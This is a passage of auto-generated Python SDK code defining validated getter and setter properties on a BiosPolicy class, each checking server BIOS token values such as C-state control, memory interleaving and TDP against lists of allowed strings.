allowed_values = ["platform-default", "Auto", "disabled"]
if cbs_cmn_cpu_cpb not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_cpb` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_cpb, allowed_values)
)
self._cbs_cmn_cpu_cpb = cbs_cmn_cpu_cpb
@property
def cbs_cmn_cpu_gen_downcore_ctrl(self):
"""
Gets the cbs_cmn_cpu_gen_downcore_ctrl of this BiosPolicy.
BIOS Token for setting Downcore control configuration
:return: The cbs_cmn_cpu_gen_downcore_ctrl of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_gen_downcore_ctrl
@cbs_cmn_cpu_gen_downcore_ctrl.setter
def cbs_cmn_cpu_gen_downcore_ctrl(self, cbs_cmn_cpu_gen_downcore_ctrl):
"""
Sets the cbs_cmn_cpu_gen_downcore_ctrl of this BiosPolicy.
BIOS Token for setting Downcore control configuration
:param cbs_cmn_cpu_gen_downcore_ctrl: The cbs_cmn_cpu_gen_downcore_ctrl of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "FOUR (2 + 2)", "FOUR (4 + 0)", "SIX (3 + 3)", "THREE (3 + 0)", "TWO (1 + 1)", "TWO (2 + 0)"]
if cbs_cmn_cpu_gen_downcore_ctrl not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_gen_downcore_ctrl` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_gen_downcore_ctrl, allowed_values)
)
self._cbs_cmn_cpu_gen_downcore_ctrl = cbs_cmn_cpu_gen_downcore_ctrl
@property
def cbs_cmn_cpu_global_cstate_ctrl(self):
"""
Gets the cbs_cmn_cpu_global_cstate_ctrl of this BiosPolicy.
BIOS Token for setting Global C-state Control configuration
:return: The cbs_cmn_cpu_global_cstate_ctrl of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_global_cstate_ctrl
@cbs_cmn_cpu_global_cstate_ctrl.setter
def cbs_cmn_cpu_global_cstate_ctrl(self, cbs_cmn_cpu_global_cstate_ctrl):
"""
Sets the cbs_cmn_cpu_global_cstate_ctrl of this BiosPolicy.
BIOS Token for setting Global C-state Control configuration
:param cbs_cmn_cpu_global_cstate_ctrl: The cbs_cmn_cpu_global_cstate_ctrl of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_cpu_global_cstate_ctrl not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_global_cstate_ctrl` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_global_cstate_ctrl, allowed_values)
)
self._cbs_cmn_cpu_global_cstate_ctrl = cbs_cmn_cpu_global_cstate_ctrl
@property
def cbs_cmn_cpu_l1stream_hw_prefetcher(self):
"""
Gets the cbs_cmn_cpu_l1stream_hw_prefetcher of this BiosPolicy.
BIOS Token for setting L1 Stream HW Prefetcher configuration
:return: The cbs_cmn_cpu_l1stream_hw_prefetcher of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_l1stream_hw_prefetcher
@cbs_cmn_cpu_l1stream_hw_prefetcher.setter
def cbs_cmn_cpu_l1stream_hw_prefetcher(self, cbs_cmn_cpu_l1stream_hw_prefetcher):
"""
Sets the cbs_cmn_cpu_l1stream_hw_prefetcher of this BiosPolicy.
BIOS Token for setting L1 Stream HW Prefetcher configuration
:param cbs_cmn_cpu_l1stream_hw_prefetcher: The cbs_cmn_cpu_l1stream_hw_prefetcher of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_cpu_l1stream_hw_prefetcher not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_l1stream_hw_prefetcher` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_l1stream_hw_prefetcher, allowed_values)
)
self._cbs_cmn_cpu_l1stream_hw_prefetcher = cbs_cmn_cpu_l1stream_hw_prefetcher
@property
def cbs_cmn_cpu_l2stream_hw_prefetcher(self):
"""
Gets the cbs_cmn_cpu_l2stream_hw_prefetcher of this BiosPolicy.
BIOS Token for setting L2 Stream HW Prefetcher configuration
:return: The cbs_cmn_cpu_l2stream_hw_prefetcher of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_l2stream_hw_prefetcher
@cbs_cmn_cpu_l2stream_hw_prefetcher.setter
def cbs_cmn_cpu_l2stream_hw_prefetcher(self, cbs_cmn_cpu_l2stream_hw_prefetcher):
"""
Sets the cbs_cmn_cpu_l2stream_hw_prefetcher of this BiosPolicy.
BIOS Token for setting L2 Stream HW Prefetcher configuration
:param cbs_cmn_cpu_l2stream_hw_prefetcher: The cbs_cmn_cpu_l2stream_hw_prefetcher of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_cpu_l2stream_hw_prefetcher not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_l2stream_hw_prefetcher` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_l2stream_hw_prefetcher, allowed_values)
)
self._cbs_cmn_cpu_l2stream_hw_prefetcher = cbs_cmn_cpu_l2stream_hw_prefetcher
@property
def cbs_cmn_determinism_slider(self):
"""
Gets the cbs_cmn_determinism_slider of this BiosPolicy.
BIOS Token for setting Determinism Slider configuration
:return: The cbs_cmn_determinism_slider of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_determinism_slider
@cbs_cmn_determinism_slider.setter
def cbs_cmn_determinism_slider(self, cbs_cmn_determinism_slider):
"""
Sets the cbs_cmn_determinism_slider of this BiosPolicy.
BIOS Token for setting Determinism Slider configuration
:param cbs_cmn_determinism_slider: The cbs_cmn_determinism_slider of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Performance", "Power"]
if cbs_cmn_determinism_slider not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_determinism_slider` ({0}), must be one of {1}"
.format(cbs_cmn_determinism_slider, allowed_values)
)
self._cbs_cmn_determinism_slider = cbs_cmn_determinism_slider
@property
def cbs_cmn_gnb_nb_iommu(self):
"""
Gets the cbs_cmn_gnb_nb_iommu of this BiosPolicy.
BIOS Token for setting IOMMU configuration
:return: The cbs_cmn_gnb_nb_iommu of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_gnb_nb_iommu
@cbs_cmn_gnb_nb_iommu.setter
def cbs_cmn_gnb_nb_iommu(self, cbs_cmn_gnb_nb_iommu):
"""
Sets the cbs_cmn_gnb_nb_iommu of this BiosPolicy.
BIOS Token for setting IOMMU configuration
:param cbs_cmn_gnb_nb_iommu: The cbs_cmn_gnb_nb_iommu of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_gnb_nb_iommu not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_gnb_nb_iommu` ({0}), must be one of {1}"
.format(cbs_cmn_gnb_nb_iommu, allowed_values)
)
self._cbs_cmn_gnb_nb_iommu = cbs_cmn_gnb_nb_iommu
@property
def cbs_cmn_mem_ctrl_bank_group_swap_ddr4(self):
"""
Gets the cbs_cmn_mem_ctrl_bank_group_swap_ddr4 of this BiosPolicy.
BIOS Token for setting Bank Group Swap configuration
:return: The cbs_cmn_mem_ctrl_bank_group_swap_ddr4 of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_mem_ctrl_bank_group_swap_ddr4
@cbs_cmn_mem_ctrl_bank_group_swap_ddr4.setter
def cbs_cmn_mem_ctrl_bank_group_swap_ddr4(self, cbs_cmn_mem_ctrl_bank_group_swap_ddr4):
"""
Sets the cbs_cmn_mem_ctrl_bank_group_swap_ddr4 of this BiosPolicy.
BIOS Token for setting Bank Group Swap configuration
:param cbs_cmn_mem_ctrl_bank_group_swap_ddr4: The cbs_cmn_mem_ctrl_bank_group_swap_ddr4 of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_mem_ctrl_bank_group_swap_ddr4 not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_mem_ctrl_bank_group_swap_ddr4` ({0}), must be one of {1}"
.format(cbs_cmn_mem_ctrl_bank_group_swap_ddr4, allowed_values)
)
self._cbs_cmn_mem_ctrl_bank_group_swap_ddr4 = cbs_cmn_mem_ctrl_bank_group_swap_ddr4
@property
def cbs_cmn_mem_map_bank_interleave_ddr4(self):
"""
Gets the cbs_cmn_mem_map_bank_interleave_ddr4 of this BiosPolicy.
BIOS Token for setting Chipselect Interleaving configuration
:return: The cbs_cmn_mem_map_bank_interleave_ddr4 of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_mem_map_bank_interleave_ddr4
@cbs_cmn_mem_map_bank_interleave_ddr4.setter
def cbs_cmn_mem_map_bank_interleave_ddr4(self, cbs_cmn_mem_map_bank_interleave_ddr4):
"""
Sets the cbs_cmn_mem_map_bank_interleave_ddr4 of this BiosPolicy.
BIOS Token for setting Chipselect Interleaving configuration
:param cbs_cmn_mem_map_bank_interleave_ddr4: The cbs_cmn_mem_map_bank_interleave_ddr4 of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled"]
if cbs_cmn_mem_map_bank_interleave_ddr4 not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_mem_map_bank_interleave_ddr4` ({0}), must be one of {1}"
.format(cbs_cmn_mem_map_bank_interleave_ddr4, allowed_values)
)
self._cbs_cmn_mem_map_bank_interleave_ddr4 = cbs_cmn_mem_map_bank_interleave_ddr4
@property
def cbs_cmnc_tdp_ctl(self):
"""
Gets the cbs_cmnc_tdp_ctl of this BiosPolicy.
BIOS Token for setting cTDP Control configuration
:return: The cbs_cmnc_tdp_ctl of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmnc_tdp_ctl
@cbs_cmnc_tdp_ctl.setter
def cbs_cmnc_tdp_ctl(self, cbs_cmnc_tdp_ctl):
"""
Sets the cbs_cmnc_tdp_ctl of this BiosPolicy.
BIOS Token for setting cTDP Control configuration
:param cbs_cmnc_tdp_ctl: The cbs_cmnc_tdp_ctl of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Manual"]
if cbs_cmnc_tdp_ctl not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmnc_tdp_ctl` ({0}), must be one of {1}"
.format(cbs_cmnc_tdp_ctl, allowed_values)
)
self._cbs_cmnc_tdp_ctl = cbs_cmnc_tdp_ctl
@property
def cbs_df_cmn_mem_intlv(self):
"""
Gets the cbs_df_cmn_mem_intlv of this BiosPolicy.
BIOS Token for setting Memory interleaving configuration
:return: The cbs_df_cmn_mem_intlv of this BiosPolicy.
:rtype: str
"""
return self._cbs_df_cmn_mem_intlv
@cbs_df_cmn_mem_intlv.setter
def cbs_df_cmn_mem_intlv(self, cbs_df_cmn_mem_intlv):
"""
Sets the cbs_df_cmn_mem_intlv of this BiosPolicy.
BIOS Token for setting Memory interleaving configuration
:param cbs_df_cmn_mem_intlv: The cbs_df_cmn_mem_intlv of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Channel", "Die", "None", "Socket"]
if cbs_df_cmn_mem_intlv not in allowed_values:
raise ValueError(
"Invalid value for `cbs_df_cmn_mem_intlv` ({0}), must be one of {1}"
.format(cbs_df_cmn_mem_intlv, allowed_values)
)
self._cbs_df_cmn_mem_intlv = cbs_df_cmn_mem_intlv
@property
def cbs_df_cmn_mem_intlv_size(self):
"""
Gets the cbs_df_cmn_mem_intlv_size of this BiosPolicy.
BIOS Token for setting Memory interleaving size configuration
:return: The cbs_df_cmn_mem_intlv_size of this BiosPolicy.
:rtype: str
"""
return self._cbs_df_cmn_mem_intlv_size
@cbs_df_cmn_mem_intlv_size.setter
def cbs_df_cmn_mem_intlv_size(self, cbs_df_cmn_mem_intlv_size):
"""
Sets the cbs_df_cmn_mem_intlv_size of this BiosPolicy.
BIOS Token for setting Memory interleaving size configuration
:param cbs_df_cmn_mem_intlv_size: The cbs_df_cmn_mem_intlv_size of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1 KB", "2 KB", "256 Bytes", "512 Bytes", "Auto"]
if cbs_df_cmn_mem_intlv_size not in allowed_values:
raise ValueError(
"Invalid value for `cbs_df_cmn_mem_intlv_size` ({0}), must be one of {1}"
.format(cbs_df_cmn_mem_intlv_size, allowed_values)
)
self._cbs_df_cmn_mem_intlv_size = cbs_df_cmn_mem_intlv_size
@property
def cdn_enable(self):
"""
Gets the cdn_enable of this BiosPolicy.
BIOS Token for setting Consistent Device Naming configuration
:return: The cdn_enable of this BiosPolicy.
:rtype: str
"""
return self._cdn_enable
@cdn_enable.setter
def cdn_enable(self, cdn_enable):
"""
Sets the cdn_enable of this BiosPolicy.
BIOS Token for setting Consistent Device Naming configuration
:param cdn_enable: The cdn_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if cdn_enable not in allowed_values:
raise ValueError(
"Invalid value for `cdn_enable` ({0}), must be one of {1}"
.format(cdn_enable, allowed_values)
)
self._cdn_enable = cdn_enable
@property
def cdn_support(self):
"""
Gets the cdn_support of this BiosPolicy.
BIOS Token for setting CDN Support for LOM configuration
:return: The cdn_support of this BiosPolicy.
:rtype: str
"""
return self._cdn_support
@cdn_support.setter
def cdn_support(self, cdn_support):
"""
Sets the cdn_support of this BiosPolicy.
BIOS Token for setting CDN Support for LOM configuration
:param cdn_support: The cdn_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "LOMs Only"]
if cdn_support not in allowed_values:
raise ValueError(
"Invalid value for `cdn_support` ({0}), must be one of {1}"
.format(cdn_support, allowed_values)
)
self._cdn_support = cdn_support
@property
def channel_inter_leave(self):
"""
Gets the channel_inter_leave of this BiosPolicy.
BIOS Token for setting Channel Interleaving configuration
:return: The channel_inter_leave of this BiosPolicy.
:rtype: str
"""
return self._channel_inter_leave
@channel_inter_leave.setter
def channel_inter_leave(self, channel_inter_leave):
"""
Sets the channel_inter_leave of this BiosPolicy.
BIOS Token for setting Channel Interleaving configuration
:param channel_inter_leave: The channel_inter_leave of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1-way", "2-way", "3-way", "4-way", "auto"]
if channel_inter_leave not in allowed_values:
raise ValueError(
"Invalid value for `channel_inter_leave` ({0}), must be one of {1}"
.format(channel_inter_leave, allowed_values)
)
self._channel_inter_leave = channel_inter_leave
@property
def cke_low_policy(self):
"""
Gets the cke_low_policy of this BiosPolicy.
BIOS Token for setting CKE Low Policy configuration
:return: The cke_low_policy of this BiosPolicy.
:rtype: str
"""
return self._cke_low_policy
@cke_low_policy.setter
def cke_low_policy(self, cke_low_policy):
"""
Sets the cke_low_policy of this BiosPolicy.
BIOS Token for setting CKE Low Policy configuration
:param cke_low_policy: The cke_low_policy of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "auto", "disabled", "fast", "slow"]
if cke_low_policy not in allowed_values:
raise ValueError(
"Invalid value for `cke_low_policy` ({0}), must be one of {1}"
.format(cke_low_policy, allowed_values)
)
self._cke_low_policy = cke_low_policy
@property
def closed_loop_therm_throtl(self):
"""
Gets the closed_loop_therm_throtl of this BiosPolicy.
BIOS Token for setting Closed Loop Therm Throt configuration
:return: The closed_loop_therm_throtl of this BiosPolicy.
:rtype: str
"""
return self._closed_loop_therm_throtl
@closed_loop_therm_throtl.setter
def closed_loop_therm_throtl(self, closed_loop_therm_throtl):
"""
Sets the closed_loop_therm_throtl of this BiosPolicy.
BIOS Token for setting Closed Loop Therm Throt configuration
:param closed_loop_therm_throtl: The closed_loop_therm_throtl of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if closed_loop_therm_throtl not in allowed_values:
raise ValueError(
"Invalid value for `closed_loop_therm_throtl` ({0}), must be one of {1}"
.format(closed_loop_therm_throtl, allowed_values)
)
self._closed_loop_therm_throtl = closed_loop_therm_throtl
@property
def cmci_enable(self):
"""
Gets the cmci_enable of this BiosPolicy.
BIOS Token for setting Processor CMCI configuration
:return: The cmci_enable of this BiosPolicy.
:rtype: str
"""
return self._cmci_enable
@cmci_enable.setter
def cmci_enable(self, cmci_enable):
"""
Sets the cmci_enable of this BiosPolicy.
BIOS Token for setting Processor CMCI configuration
:param cmci_enable: The cmci_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if cmci_enable not in allowed_values:
raise ValueError(
"Invalid value for `cmci_enable` ({0}), must be one of {1}"
.format(cmci_enable, allowed_values)
)
self._cmci_enable = cmci_enable
@property
def config_tdp(self):
"""
Gets the config_tdp of this BiosPolicy.
BIOS Token for setting Config TDP configuration
:return: The config_tdp of this BiosPolicy.
:rtype: str
"""
return self._config_tdp
@config_tdp.setter
def config_tdp(self, config_tdp):
"""
Sets the config_tdp of this BiosPolicy.
BIOS Token for setting Config TDP configuration
:param config_tdp: The config_tdp of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if config_tdp not in allowed_values:
raise ValueError(
"Invalid value for `config_tdp` ({0}), must be one of {1}"
.format(config_tdp, allowed_values)
)
self._config_tdp = config_tdp
@property
def console_redirection(self):
"""
Gets the console_redirection of this BiosPolicy.
BIOS Token for setting Console redirection configuration
:return: The console_redirection of this BiosPolicy.
:rtype: str
"""
return self._console_redirection
@console_redirection.setter
def console_redirection(self, console_redirection):
"""
Sets the console_redirection of this BiosPolicy.
BIOS Token for setting Console redirection configuration
:param console_redirection: The console_redirection of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "com-0", "com-1", "disabled", "enabled", "serial-port-a"]
if console_redirection not in allowed_values:
raise ValueError(
"Invalid value for `console_redirection` ({0}), must be one of {1}"
.format(console_redirection, allowed_values)
)
self._console_redirection = console_redirection
@property
def core_multi_processing(self):
"""
Gets the core_multi_processing of this BiosPolicy.
BIOS Token for setting Core MultiProcessing configuration
:return: The core_multi_processing of this BiosPolicy.
:rtype: str
"""
return self._core_multi_processing
@core_multi_processing.setter
def core_multi_processing(self, core_multi_processing):
"""
Sets the core_multi_processing of this BiosPolicy.
BIOS Token for setting Core MultiProcessing configuration
:param core_multi_processing: The core_multi_processing of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "2", "20", "21", "22", "23", "24", "25", "26", "27", "28", "3", "4", "5", "6", "7", "8", "9", "all"]
if core_multi_processing not in allowed_values:
raise ValueError(
"Invalid value for `core_multi_processing` ({0}), must be one of {1}"
.format(core_multi_processing, allowed_values)
)
self._core_multi_processing = core_multi_processing
@property
def cpu_energy_performance(self):
"""
Gets the cpu_energy_performance of this BiosPolicy.
BIOS Token for setting Energy Performance configuration
:return: The cpu_energy_performance of this BiosPolicy.
:rtype: str
"""
return self._cpu_energy_performance
@cpu_energy_performance.setter
def cpu_energy_performance(self, cpu_energy_performance):
"""
Sets the cpu_energy_performance of this BiosPolicy.
BIOS Token for setting Energy Performance configuration
:param cpu_energy_performance: The cpu_energy_performance of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "balanced-energy", "balanced-performance", "balanced-power", "energy-efficient", "performance", "power"]
if cpu_energy_performance not in allowed_values:
raise ValueError(
"Invalid value for `cpu_energy_performance` ({0}), must be one of {1}"
.format(cpu_energy_performance, allowed_values)
)
self._cpu_energy_performance = cpu_energy_performance
@property
def cpu_frequency_floor(self):
"""
Gets the cpu_frequency_floor of this BiosPolicy.
BIOS Token for setting Frequency Floor Override configuration
:return: The cpu_frequency_floor of this BiosPolicy.
:rtype: str
"""
return self._cpu_frequency_floor
@cpu_frequency_floor.setter
def cpu_frequency_floor(self, cpu_frequency_floor):
"""
Sets the cpu_frequency_floor of this BiosPolicy.
BIOS Token for setting Frequency Floor Override configuration
:param cpu_frequency_floor: The cpu_frequency_floor of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if cpu_frequency_floor not in allowed_values:
raise ValueError(
"Invalid value for `cpu_frequency_floor` ({0}), must be one of {1}"
.format(cpu_frequency_floor, allowed_values)
)
self._cpu_frequency_floor = cpu_frequency_floor
@property
def cpu_performance(self):
"""
Gets the cpu_performance of this BiosPolicy.
BIOS Token for setting CPU Performance configuration
:return: The cpu_performance of this BiosPolicy.
:rtype: str
"""
return self._cpu_performance
@cpu_performance.setter
def cpu_performance(self, cpu_performance):
"""
Sets the cpu_performance of this BiosPolicy.
BIOS Token for setting CPU Performance configuration
:param cpu_performance: The cpu_performance of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "custom", "enterprise", "high-throughput", "hpc"]
if cpu_performance not in allowed_values:
raise ValueError(
"Invalid value for `cpu_performance` ({0}), must be one of {1}"
.format(cpu_performance, allowed_values)
)
self._cpu_performance = cpu_performance
@property
def cpu_power_management(self):
"""
Gets the cpu_power_management of this BiosPolicy.
BIOS Token for setting Power Technology configuration
:return: The cpu_power_management of this BiosPolicy.
:rtype: str
"""
return self._cpu_power_management
@cpu_power_management.setter
def cpu_power_management(self, cpu_power_management):
"""
Sets the cpu_power_management of this BiosPolicy.
BIOS Token for setting Power Technology configuration
:param cpu_power_management: The cpu_power_management of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "custom", "disabled", "energy-efficient", "performance"]
if cpu_power_management not in allowed_values:
raise ValueError(
"Invalid value for `cpu_power_management` ({0}), must be one of {1}"
.format(cpu_power_management, allowed_values)
)
self._cpu_power_management = cpu_power_management
@property
def demand_scrub(self):
"""
Gets the demand_scrub of this BiosPolicy.
BIOS Token for setting Demand Scrub configuration
:return: The demand_scrub of this BiosPolicy.
:rtype: str
"""
return self._demand_scrub
@demand_scrub.setter
def demand_scrub(self, demand_scrub):
"""
Sets the demand_scrub of this BiosPolicy.
BIOS Token for setting Demand Scrub configuration
:param demand_scrub: The demand_scrub of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if demand_scrub not in allowed_values:
raise ValueError(
"Invalid value for `demand_scrub` ({0}), must be one of {1}"
.format(demand_scrub, allowed_values)
)
self._demand_scrub = demand_scrub
@property
def direct_cache_access(self):
"""
Gets the direct_cache_access of this BiosPolicy.
BIOS Token for setting Direct Cache Access Support configuration
:return: The direct_cache_access of this BiosPolicy.
:rtype: str
"""
return self._direct_cache_access
@direct_cache_access.setter
def direct_cache_access(self, direct_cache_access):
"""
Sets the direct_cache_access of this BiosPolicy.
BIOS Token for setting Direct Cache Access Support configuration
:param direct_cache_access: The direct_cache_access of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "auto", "disabled", "enabled"]
if direct_cache_access not in allowed_values:
raise ValueError(
"Invalid value for `direct_cache_access` ({0}), must be one of {1}"
.format(direct_cache_access, allowed_values)
)
self._direct_cache_access = direct_cache_access
@property
def dram_clock_throttling(self):
"""
Gets the dram_clock_throttling of this BiosPolicy.
BIOS Token for setting DRAM Clock Throttling configuration
:return: The dram_clock_throttling of this BiosPolicy.
:rtype: str
"""
return self._dram_clock_throttling
@dram_clock_throttling.setter
def dram_clock_throttling(self, dram_clock_throttling):
"""
Sets the dram_clock_throttling of this BiosPolicy.
BIOS Token for setting DRAM Clock Throttling configuration
:param dram_clock_throttling: The dram_clock_throttling of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Balanced", "Energy Efficient", "Performance"]
if dram_clock_throttling not in allowed_values:
raise ValueError(
"Invalid value for `dram_clock_throttling` ({0}), must be one of {1}"
.format(dram_clock_throttling, allowed_values)
)
self._dram_clock_throttling = dram_clock_throttling
@property
def dram_refresh_rate(self):
"""
Gets the dram_refresh_rate of this BiosPolicy.
BIOS Token for setting DRAM Refresh Rate configuration
:return: The dram_refresh_rate of this BiosPolicy.
:rtype: str
"""
return self._dram_refresh_rate
@dram_refresh_rate.setter
def dram_refresh_rate(self, dram_refresh_rate):
"""
Sets the dram_refresh_rate of this BiosPolicy.
BIOS Token for setting DRAM Refresh Rate configuration
:param dram_refresh_rate: The dram_refresh_rate of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1x", "2x", "3x", "4x", "Auto"]
if dram_refresh_rate not in allowed_values:
raise ValueError(
"Invalid value for `dram_refresh_rate` ({0}), must be one of {1}"
.format(dram_refresh_rate, allowed_values)
)
self._dram_refresh_rate = dram_refresh_rate
@property
def energy_efficient_turbo(self):
"""
Gets the energy_efficient_turbo of this BiosPolicy.
BIOS Token for setting Energy Efficient Turbo configuration
:return: The energy_efficient_turbo of this BiosPolicy.
:rtype: str
"""
return self._energy_efficient_turbo
@energy_efficient_turbo.setter
def energy_efficient_turbo(self, energy_efficient_turbo):
"""
Sets the energy_efficient_turbo of this BiosPolicy.
BIOS Token for setting Energy Efficient Turbo configuration
:param energy_efficient_turbo: The energy_efficient_turbo of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if energy_efficient_turbo not in allowed_values:
raise ValueError(
"Invalid value for `energy_efficient_turbo` ({0}), must be one of {1}"
.format(energy_efficient_turbo, allowed_values)
)
self._energy_efficient_turbo = energy_efficient_turbo
@property
def eng_perf_tuning(self):
"""
Gets the eng_perf_tuning of this BiosPolicy.
BIOS Token for setting Energy Performance Tuning configuration
:return: The eng_perf_tuning of this BiosPolicy.
:rtype: str
"""
return self._eng_perf_tuning
@eng_perf_tuning.setter
def eng_perf_tuning(self, eng_perf_tuning):
"""
Sets the eng_perf_tuning of this BiosPolicy.
BIOS Token for setting Energy Performance Tuning configuration
:param eng_perf_tuning: The eng_perf_tuning of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "BIOS", "OS"]
if eng_perf_tuning not in allowed_values:
raise ValueError(
"Invalid value for `eng_perf_tuning` ({0}), must be one of {1}"
.format(eng_perf_tuning, allowed_values)
)
self._eng_perf_tuning = eng_perf_tuning
@property
def enhanced_intel_speed_step_tech(self):
"""
Gets the enhanced_intel_speed_step_tech of this BiosPolicy.
BIOS Token for setting Enhanced Intel Speedstep(R) Technology configuration
:return: The enhanced_intel_speed_step_tech of this BiosPolicy.
:rtype: str
"""
return self._enhanced_intel_speed_step_tech
@enhanced_intel_speed_step_tech.setter
def enhanced_intel_speed_step_tech(self, enhanced_intel_speed_step_tech):
"""
Sets the enhanced_intel_speed_step_tech of this BiosPolicy.
BIOS Token for setting Enhanced Intel Speedstep(R) Technology configuration
:param enhanced_intel_speed_step_tech: The enhanced_intel_speed_step_tech of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if enhanced_intel_speed_step_tech not in allowed_values:
raise ValueError(
"Invalid value for `enhanced_intel_speed_step_tech` ({0}), must be one of {1}"
.format(enhanced_intel_speed_step_tech, allowed_values)
)
self._enhanced_intel_speed_step_tech = enhanced_intel_speed_step_tech
@property
def epp_profile(self):
"""
Gets the epp_profile of this BiosPolicy.
BIOS Token for setting EPP Profile configuration
:return: The epp_profile of this BiosPolicy.
:rtype: str
"""
return self._epp_profile
@epp_profile.setter
def epp_profile(self, epp_profile):
"""
Sets the epp_profile of this BiosPolicy.
BIOS Token for setting EPP Profile configuration
:param epp_profile: The epp_profile of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Balanced Performance", "Balanced Power", "Performance", "Power"]
if epp_profile not in allowed_values:
raise ValueError(
"Invalid value for `epp_profile` ({0}), must be one of {1}"
.format(epp_profile, allowed_values)
)
self._epp_profile = epp_profile
@property
def execute_disable_bit(self):
"""
Gets the execute_disable_bit of this BiosPolicy.
BIOS Token for setting Execute Disable Bit configuration
:return: The execute_disable_bit of this BiosPolicy.
:rtype: str
"""
return self._execute_disable_bit
@execute_disable_bit.setter
def execute_disable_bit(self, execute_disable_bit):
"""
Sets the execute_disable_bit of this BiosPolicy.
BIOS Token for setting Execute Disable Bit configuration
:param execute_disable_bit: The execute_disable_bit of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if execute_disable_bit not in allowed_values:
raise ValueError(
"Invalid value for `execute_disable_bit` ({0}), must be one of {1}"
.format(execute_disable_bit, allowed_values)
)
self._execute_disable_bit = execute_disable_bit
@property
def extended_apic(self):
"""
Gets the extended_apic of this BiosPolicy.
BIOS Token for setting Local X2 Apic configuration
:return: The extended_apic of this BiosPolicy.
:rtype: str
"""
return self._extended_apic
@extended_apic.setter
def extended_apic(self, extended_apic):
"""
Sets the extended_apic of this BiosPolicy.
BIOS Token for setting Local X2 Apic configuration
:param extended_apic: The extended_apic of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "X2APIC", "XAPIC"]
if extended_apic not in allowed_values:
raise ValueError(
"Invalid value for `extended_apic` ({0}), must be one of {1}"
.format(extended_apic, allowed_values)
)
self._extended_apic = extended_apic
@property
def flow_control(self):
"""
Gets the flow_control of this BiosPolicy.
BIOS Token for setting Flow Control configuration
:return: The flow_control of this BiosPolicy.
:rtype: str
"""
return self._flow_control
@flow_control.setter
def flow_control(self, flow_control):
"""
Sets the flow_control of this BiosPolicy.
BIOS Token for setting Flow Control configuration
:param flow_control: The flow_control of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "none", "rts-cts"]
if flow_control not in allowed_values:
raise ValueError(
"Invalid value for `flow_control` ({0}), must be one of {1}"
.format(flow_control, allowed_values)
)
self._flow_control = flow_control
@property
def frb2enable(self):
"""
Gets the frb2enable of this BiosPolicy.
BIOS Token for setting FRB-2 Timer configuration
:return: The frb2enable of this BiosPolicy.
:rtype: str
"""
return self._frb2enable
@frb2enable.setter
def frb2enable(self, frb2enable):
"""
Sets the frb2enable of this BiosPolicy.
BIOS Token for setting FRB-2 Timer configuration
